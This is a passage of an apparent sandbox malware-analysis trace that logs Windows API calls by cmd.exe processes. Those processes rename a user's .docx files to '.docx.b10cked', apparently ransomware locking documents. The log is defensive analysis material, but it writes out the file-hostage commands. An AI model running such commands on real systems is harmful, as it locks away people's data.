lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.457] SetErrorMode (uMode=0x0) returned 0x0 [0136.457] SetErrorMode (uMode=0x1) returned 0x0 [0136.458] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", nBufferLength=0x104, lpBuffer=0x2ced74, lpFilePart=0x2ced5c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", lpFilePart=0x2ced5c*="ERN4JQ~1.DOC") returned 0x26 [0136.458] SetErrorMode (uMode=0x0) returned 0x1 [0136.458] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0136.458] _wcsicmp (_String1="ERN4JQ~1.DOC", _String2=".") returned 55 [0136.458] _wcsicmp (_String1="ERN4JQ~1.DOC", _String2="..") returned 55 [0136.458] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jq~1.doc")) returned 0x20 [0136.458] SetErrorMode (uMode=0x0) returned 0x0 [0136.458] SetErrorMode (uMode=0x1) returned 0x0 [0136.458] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", nBufferLength=0x104, lpBuffer=0x2cf1f0, lpFilePart=0x2cef88 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", lpFilePart=0x2cef88*="ERN4JQ~1.DOC") returned 0x26 [0136.458] SetErrorMode (uMode=0x0) returned 0x1 [0136.458] SetErrorMode (uMode=0x0) returned 0x0 [0136.458] SetErrorMode (uMode=0x1) returned 0x0 [0136.458] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked", nBufferLength=0x104, lpBuffer=0x2cf3f8, lpFilePart=0x2cef88 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked", lpFilePart=0x2cef88*="ERN4JQpRpgZde9N.docx.b10cked") returned 0x36 [0136.458] SetErrorMode (uMode=0x0) returned 0x1 [0136.458] SetLastError (dwErrCode=0x0) [0136.458] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jqprpgzde9n.docx.b10cked")) returned 0xffffffff [0136.458] GetLastError () returned 0x2 [0136.458] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", fInfoLevelId=0x1, 
lpFindFileData=0x2ce904, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce904) returned 0x360e50 [0136.458] FindNextFileW (in: hFindFile=0x360e50, lpFindFileData=0x2ce904 | out: lpFindFileData=0x2ce904) returned 0 [0136.459] GetLastError () returned 0x12 [0136.459] FindClose (in: hFindFile=0x360e50 | out: hFindFile=0x360e50) returned 1 [0136.460] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x371bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371bd0) returned 0x360e50 [0136.460] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked", nBufferLength=0x104, lpBuffer=0x2ceb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked", lpFilePart=0x0) returned 0x36 [0136.460] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx", nBufferLength=0x104, lpBuffer=0x2ceb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx", lpFilePart=0x0) returned 0x2e [0136.460] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jqprpgzde9n.docx")) returned 0x20 [0136.460] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jqprpgzde9n.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jqprpgzde9n.docx.b10cked"), dwFlags=0x3) returned 1 [0136.460] FindClose (in: hFindFile=0x360e50 | out: hFindFile=0x360e50) returned 1 [0136.461] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ceb50 | out: _Buffer=" 1") returned 9 [0136.461] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.461] GetFileType (hFile=0x7) returned 0x2 [0136.659] GetStdHandle 
(nStdHandle=0xfffffff5) returned 0x7 [0136.659] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceadc | out: lpMode=0x2ceadc) returned 1 [0136.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.659] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ceb10 | out: lpConsoleScreenBufferInfo=0x2ceb10) returned 1 [0136.659] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.659] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ceb50 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.659] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ceb34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ceb34*=0x1a) returned 1 [0136.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.659] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.660] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.660] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.660] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.660] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.660] SetConsoleInputExeNameW () returned 0x1 [0136.660] GetConsoleOutputCP () returned 0x1b5 [0136.660] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.660] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.660] exit (_Code=0) Process: id = "139" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xc38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = 
"\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13684 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13685 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13686 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13687 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 13688 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13689 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13690 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13691 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13692 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 13693 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14059 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14060 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14061 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14062 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 14063 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 14064 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14065 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14066 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14067 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = 
"kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14068 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14069 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14070 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14071 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14072 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14137 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 14138 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14139 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14140 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14141 start_va = 0xd0000 end_va = 0xd1fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 14142 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 14143 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14144 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 14145 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 14146 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 196 os_tid = 0xbec [0136.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fdcc | out: lpSystemTimeAsFileTime=0x24fdcc*(dwLowDateTime=0x8b2ee500, dwHighDateTime=0x1d440a9)) [0136.310] GetCurrentProcessId () returned 0xc38 [0136.310] GetCurrentThreadId () returned 0xbec [0136.310] GetTickCount () returned 0x2b163 [0136.310] QueryPerformanceCounter (in: lpPerformanceCount=0x24fdc4 | out: lpPerformanceCount=0x24fdc4*=19309956965) returned 1 [0136.311] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.311] __set_app_type (_Type=0x1) [0136.311] __p__fmode () returned 0x76b331f4 [0136.311] __p__commode () returned 0x76b331fc [0136.311] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.311] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.311] GetCurrentThreadId () returned 0xbec [0136.312] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbec) returned 0x38 [0136.312] GetModuleHandleW 
(lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.312] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.312] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.324] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.324] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fd5c | out: phkResult=0x24fd5c*=0x0) returned 0x2 [0136.324] VirtualQuery (in: lpAddress=0x24fd93, lpBuffer=0x24fd2c, dwLength=0x1c | out: lpBuffer=0x24fd2c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fd2c, dwLength=0x1c | out: lpBuffer=0x24fd2c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fd2c, dwLength=0x1c | out: lpBuffer=0x24fd2c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fd2c, dwLength=0x1c | out: lpBuffer=0x24fd2c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fd2c, dwLength=0x1c | out: lpBuffer=0x24fd2c*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.324] GetConsoleOutputCP () returned 0x1b5 [0136.326] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.326] SetConsoleCtrlHandler 
(HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.327] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.327] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.331] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.331] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.358] GetEnvironmentStringsW () returned 0x350180* [0136.358] FreeEnvironmentStringsW (penv=0x350180) returned 1 [0136.358] GetEnvironmentStringsW () returned 0x350180* [0136.359] FreeEnvironmentStringsW (penv=0x350180) returned 1 [0136.359] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eccc | out: phkResult=0x24eccc*=0x40) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0xa8, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x1, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0x1, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, 
lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x0, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x40, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x40, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0x40, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegCloseKey (hKey=0x40) returned 0x0 [0136.359] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eccc | out: phkResult=0x24eccc*=0x40) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0x40, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x1, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0x1, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: 
lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x0, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x9, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x9, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0x9, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegCloseKey (hKey=0x40) returned 0x0 [0136.360] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.360] srand (_Seed=0x5b88636a) [0136.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked\"" [0136.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked\"" [0136.360] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.360] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3518e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.360] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.360] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, 
nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.360] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.360] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.360] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.360] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.360] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.360] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.361] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.361] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.361] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.361] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.361] GetEnvironmentStringsW () returned 0x3522d0* [0136.361] FreeEnvironmentStringsW (penv=0x3522d0) returned 1 [0136.361] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.361] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.361] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.361] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.361] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.361] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.361] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.361] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.361] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.361] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.361] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fa98 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0136.361] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fa98, lpFilePart=0x24fa94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fa94*="Desktop") returned 0x18 [0136.361] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.361] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f814 | out: lpFindFileData=0x24f814) returned 0x350010 [0136.362] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0136.362] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f814 | out: lpFindFileData=0x24f814) returned 0x350010 [0136.362] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0136.362] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f814 | out: lpFindFileData=0x24f814) returned 0x350010 [0136.362] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0136.362] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.362] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.362] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.362] GetEnvironmentStringsW () returned 0x352af0* [0136.363] FreeEnvironmentStringsW (penv=0x352af0) returned 1 [0136.363] GetCurrentDirectoryW (in: nBufferLength=0x104, 